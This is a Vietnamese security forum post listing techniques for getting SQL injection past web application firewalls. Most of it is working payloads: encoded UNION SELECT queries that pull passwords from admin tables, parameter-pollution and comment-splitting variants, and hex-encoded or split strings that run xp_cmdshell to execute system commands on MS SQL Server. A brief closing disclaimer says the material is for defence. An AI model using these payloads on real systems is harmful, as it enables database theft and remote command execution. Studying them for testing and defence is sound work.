[SQL injection] Một vài kỹ thuật bypass waf

DDos

VIP Members
22/10/2013
524
2.191 bài viết
[SQL injection] Một vài kỹ thuật bypass waf
  • URL encode

    original payload: ?id=1 union select pass from admin limit 1


    encode pyaload: id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70% 61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69 %6d%69%74%20%31
  • Unicode encode

    original payload: ?id=1 union select pass from admin limit 1


    encode pyaload: ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
  • Http parameter contamination/complex parameter bypass
    ?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6, 7,8,9,10,11,12,13,14,15,16,17,18&id=19%20from%28ad min%29%29
    ?id=1&id=1/**/And/**/1=2/**/Union/**/Select/**/1,concat%28database%28%29,0x3a,user%28%29,0x3a,ver sion%28%29%29,3
    ?id=1 union select 1&id=pass from admin
  • Special character contamination bypass

    //%00 equivalent to NULL, null characters cut it, WAF parse url parameters in the time being cut off

    replace spaces with /**/ And replaced with a %n%d, ;[NULL] ;%00 ;x00, ||….
  • Search engine whitelist bypass, agent proxy bypass
  • Method bypass

    Change GET to POST, POST to GET …

    GET /id=1 union select 1,2,3,4

    POST id=1 union select 1,2,3,4
  • Encoding Bypass (urlencoded/from-data)
  • The keyword split bypass

    ?id=1;EXEC(‘ma’+’ster..x’+’p_cm’+’dsh’+’ell “net user”‘)
  • Database special syntax bypass

    ?id=1.union%0aselect@1,2 ,!3,4
  • Use the comment statement to bypass

    UNION /**/ Select /**/user,pwd,from tbluser
  • HEX bypass

    0x730079007300610064006D0069006E00 =hex(sysadmin)

    0x640062005F006F0077006E0065007200 =hex(db_owner)

    ?id=1;declare%20@a%20sysname%20select @a=0x6e006500740020007500730065007200200061006e006 70065006c002000700061007300730020002f0061006400640 0 exec master.dbo.xp_cmdshell @a;–
  • GET Parameter SQL Injection %0A Line Break Pollution Bypass

    ?id=-11%0Aunion%0Aselect 1,2,3,4
Source: kali-linux.co
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Bên trên